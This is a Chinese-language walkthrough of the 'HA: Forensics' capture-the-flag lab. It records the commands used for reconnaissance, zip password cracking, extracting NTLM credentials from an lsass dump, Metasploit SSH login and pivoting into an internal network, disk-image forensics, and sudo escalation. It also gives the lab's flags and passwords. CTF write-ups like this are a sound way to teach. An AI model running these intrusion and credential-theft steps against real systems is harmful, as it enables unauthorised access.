HA: Forensics靶机渗透测试

文章目录

- 靶机说明：
一、信息收集
- 1.主机发现
- 2.端口扫描
二、漏洞挖掘
- 1.访问靶机 web 服务
- 2.使用 dirb 进行目录扫描
- 3.使用 exiftool 提取数据
- 4.使用 dirb 扫描 txt 文件
- 5.PGP解密
- 6.破解密码
- 7.分析 lsass.DMP 文件
三、使用 msfconsole 进行后渗透
- 1.kali 打开 msfconsole ，search ssh/ssh_login
- 2.利用该模块
- 3.查看当前所有·会话信息
- 4.升级会话
- 5.进入会话并查看网络连接
- 6.横向渗透
四、磁盘镜像取证
- 1.打开 kali 自带工具 autopsy
- 2.火狐访问 http://localhost:9999/autopsy
五、提权
- 1.回到靶机shell，查看所有用户
- 2.查看可 sudo 执行的命令
- 3.直接提权

靶机说明：

哈：法医学是实验室的中级水平，它能让你在网络法医调查中亲身体验。这个实验室完全致力于网络法医调查的方法和工具，并且有各种技术可以找到的证据。由于这是一个捕获旗帜的过程，因此需要注意的是，这不是一个根本性的挑战，而是找到所有旗帜的主要动机。
旗数：4
目标：找到所有4个标志（获取根不是目标）

一、信息收集

1.主机发现

arp-scan -l

发现靶机 ip：192.168.1.201

2.端口扫描

nmap -A -p- 192.168.1.201

发现靶机开启了 80 端口，Apache 服务；22 端口，ssh 服务

二、漏洞挖掘

1.访问靶机 web 服务

发现一些关于指纹的图片，点击右上角 get flag，发现作者整活，未发现其他有用信息

2.使用 dirb 进行目录扫描

dirb http://192.168.1.201

发现 /images/ 目录，见名知意应该是存放图片的目录
访问该路径发现若干图片，其中有名为 DNA 和 fingerprint（指纹）的可疑图片，经过测试发现 DNA 没有有用信息

3.使用 exiftool 提取数据

apt-get install exiftool    #kali并未自带此工具，使用该命令更改
exiftool fingerprint.jpg

发现 flag1
Flag:1 {bc02d4ffbeeab9f57c5e03de1098ff31}

4.使用 dirb 扫描 txt 文件

dirb http://192.168.1.201 -X .txt

发现在网站根目录下有个 tips.txt 文件
访问该文件（这里我换了网络环境，靶机ip为192.168.2.192）

发现一个路径一个 zip 压缩文件
1)访问 http://192.168.2.192/flag.zip 进行下载 zip 文件，解压时发现需要密码

2)访问 http://192.168.2.192/igolder 发现该路径下有 clue.txt 文件，打开发现 PGP 加密

-----BEGIN PGP PRIVATE KEY BLOCK-----
Version: BCPG C# v1.6.1.0lQOsBF9sr70BCACvH5Vs2Lp9nyVIbVk4yraUmxDBxPJNitlU/IqcR2d+UDEORbDl
UClLXSqapjBFuu24p86SIcv/1VktRh79lnL5j4uKSAEuI/t6SJW4hlfovVBndUvT
X61w6TRJlLq5AsLOS38PWpIgL1ECIqliwNfCjjlvQd8xm/C9BV1lqM71JYtW34ST
XsKzxomVqGtWvrzs/tFege20z12JtqgPmqGApXzNjI4y7iH0vvVS8nCF58nwyjoH
wbx6EXk002hDe0/W7tsCGhp3gU5wzkUy4kfBfVrLp0/23kA/k4iJvlMPMAeQoJPx
AymXmXEKlp+igBrBicBw68SZgLAQhg8ZO2ybABEBAAH/AwMC/MDF76NvTu1gM8Y7
xjKap2L3OY8xeOoAeMQUueabuTP2rl7jB6YfsEcQj4xDjz0SBXIQxP0PziHpXTk3
v5FlH5nhSWZI6OgN0HF6rdjByKT4CNlkt7IVIPEQc7IidQP5K1/YhbghysyYHyBH
3TRAEwJszcjj6TsAOM1mpLXlPweM1sC3ms8xoFVSipPcHviNcQq58zLpGcWvmmuc
ZfqrRBqfpU/wZEmEvcDW1FOCvq/Bqo1psPOXYfI+ul7C0MLObmzi/u2p7EJLwf2E
tGBJ++wLdProHJHovp0WlQSHFamOWmM5p9SAq7lMegvIn3NHe0ZQS2agjBzNiMW5
LK/dZ0i1lX1SSRNNOlLC+Tf/v6bS8gAD+WSGsYEITPcRP2OpCiCBoa4d7GsK7nyF
RHIngmJrp5g1agayG92ahUFRLqQ7KGa+hu3N8/pM+x/dNH1Uw/jhKHsacpgBBCPf
Zs/NZlcMbCI0TD6CFKe2QCEnOW6iLlOEgV2ptEPJLkinaFZ8BEf5HYHUhW1CqwTZ
otvsmzkijYDvaV77zylVqb9gMJelVNWLZG3fcw+eCGF1wBBxno99xcxEgJpzdOeH
TnU3yQ1JllZb/0jQ7vBq22hrOTYo9iRBe/XOnUj1+J8QVynYLcgvEx8I8/tXnfNM
/bQkwbEohnTzklDWWKrqBXlXOTpBKZL4bk+k0U5wMpOQOkCgiHTMmklmAV/+0S/G
5EDrNNdCDCIdtXtAHJjIUtVivNNyQIgVuImYbhbXcSWziX0IT0QkRGSz8a+/MKl3
0yItTNXi/KpnOt+xfvjavzPscXyKyt7+82feOsl4f/jDFZW6P4NifjWGeP+9Q8FA
MPPZ/xDjhIgBvsqLpGDEuYp7VTVxWWIUtzao7P4WzLQAiQEcBBABAgAGBQJfbK+9
AAoJEF0YY4bPiiBW83YH/jU75ZqnBG3yJGOYa7qapXIPc/Dg6jc1FuivWlphZs8C
PSog9kqEqlY3k5OY03YBMIRgWMI2UyCgiSPcgwF8bGXm8hPQgL0QN5cFX7uubH9S
ofeM+SyRRSpuXtcWgljHe6e/ABR533bwLdk6YyHf4YyCxCDxWZRdI/FyoRYrh7q4
CTfgVJoiem1P9sViva28IBJ+H1ctyioWVEkKz1/PW9NBYy9mTbmVlwdWW1IzXRiS
OcXu0tW1rawJ/z5SwCwjKZxvSm2Hfk9eguEojbfPIoXauNRH00u4tEHO6YjD54ZC
DxpZfSHSCsOWEfOAA5EO+uDGSY4+WB6ihKmCV+i68Jc=
=KoPg
-----END PGP PRIVATE KEY BLOCK----------BEGIN PGP MESSAGE-----
Version: BCPG C# v1.6.1.0hQEMA10YY4bPiiBWAQf8DaEoVUWpzj5+3WMZcOhjfXo6Hk+MKD5TLWy5XndaEXRZ
3+aUQuECr88LG83BzmAS1MITHf7xifx4aiqgeM6bGILlvseP9W2Fmv9E5KOVLUYI
T8V3jINwmNg7FinwuYlT2ld2yU1qMwiEZ8GPTK4U90WSZh+/dYnKTVKxjdEZXlj9
FF42BygUxjJgEDFQi0HhUb7AX+tYQIQV0p5DZcTETZweyM9OBcwuhwzspjKp3Rz9
zFcnnCEZ4+JbdXTcXPD9cTBHJhWk01lclg+XR4v572HilznzWFutqcWrMuhBO0UZ
q0v1MOG03o8MN2VysMgbk8gEdOs+GE8fPBtsKqS5tsmhcwZR3QA/BctqAT+IhYtI
s7j0pd+mTG+zvQu5B41isicBb0yLA80YVlfWjjUmZAAF4oowPKJWY9CQIap39Ked
cbLU2+CI3JJf7JZvcZK4KGeuYgpRXU8Jvu3BHSEu1zCHGgieYRW254OJYZcJYFx6
v+6OPq+UNCBbhAFRjJpkOigA+GgH5lGf0vRYM/gz5vA4MDRrEojFs9DIwATbflqN
QOs=
=Y9OD
-----END PGP MESSAGE-----

5.PGP解密

访问 https://www.igolder.com/PGP/decryption/ 进行在线解密
解密后发现提示：
如果法医忘记了他的密码，这个提示可以帮助他，其中密码是6个字符长，开始3个字符是单词“for”，结束3个字符是数字

6.破解密码

1)使用 crunch 或脚本生成密码本

crunch 6 6 -t for%%% -o dict.txt

2)使用 fcrackzip 利用密码本破解密码

fcrackzip -u -D -p dict.txt flag.zip

3)使用密码解密

unzip flag.zip
for007

解压后得到 flag.pdf、lsass.DMP 文件
打开 flag.pdf 得到 flag2
Flag:2 {4a3232c59ecda21ac71bebe3b329bf36}

7.分析 lsass.DMP 文件

1)使用 pypykatz 检查内存转储文件

pypykatz lsa minidump ./lsass.DMP

发现两个明文用户名和 NTML 加密的密码，发现其密码相同
在网站 https://www.cmd5.com/ 对其进行解密
得到密码 Password@1

三、使用 msfconsole 进行后渗透

1.kali 打开 msfconsole ，search ssh/ssh_login

msfconsole
msf> search ssh/ssh_login

2.利用该模块

use 0
show options
set rhosts 192.168.1.111    #靶机IP地址，这里我右换了个网络QAQ
set username jasoos
set password Password@1
run

3.查看当前所有·会话信息

sessions -l

4.升级会话

sessions -u 1

5.进入会话并查看网络连接

sessions 2
ifconfig

发现有多个网络连接其中有一个内部 ip 172.17.0.1，我们不能从外部直接进行访问考虑使用靶机作为跳板

6.横向渗透

1)使用 exit 退出当前 meterpreter shell
再次升级 shell

exit
sessions -u 1

2)添加路由

use post/multi/manage/autoroute
set session 3
run

3)探测主机

use post/multi/gather/ping_sweep
set session 3
set rhosts 172.17.0.0/24
run

发现 127.17.0.1、127.17.0.2
4)端口扫描

use auxiliary/scanner/portscan/tcp
set rhosts 172.17.0.2
set ports 1-1000
run

发现 21 端口（ftp）开放
5)测试 ftp 是否可匿名登陆

use auxiliary/scanner/ftp/anonymous
set rhosts 172.17.0.2
run

发现可以匿名登陆

6)进入 ftp，查看文件

sessions 3
shell
python -c "import pty;pty.spawn('/bin/bash')"
ftp 172.17.0.2
anonymous
ls
cd pub
ls

发现有 saboot.001 文件，使用 get 获取

get saboot.001

7)使用 python 简单服务器进行传输文件

python -m SimpleHTTPServer 8888

8)kali 获取文件

wget http://192.168.1.111:8888/saboot.001

9)分析文件

发现该文件是个磁盘镜像

四、磁盘镜像取证

1.打开 kali 自带工具 autopsy

2.火狐访问 http://localhost:9999/autopsy

1)新建任务

2)填写信息

重新访问该工具服务

加载磁盘镜像后发现了 flag3.txt、 creads.txt：
Flag:3 {8442460f48338fe60a9497b8e0e9022f}
amVlbmFsaWlzYWdvb2RnaXJs
发现 creads.txt 中字符疑似 base64 加密，进行解密

得到明文 jeenaliisagoodgirl 疑似用户密码

五、提权

1.回到靶机shell，查看所有用户

发现 forensic 用户，尝试使用 ssh 进行连接

ssh forensic@192.168.1.111
yes
jeenaliisagoodgirl

2.查看可 sudo 执行的命令

sudo -l

发现可以执行所有命令

3.直接提权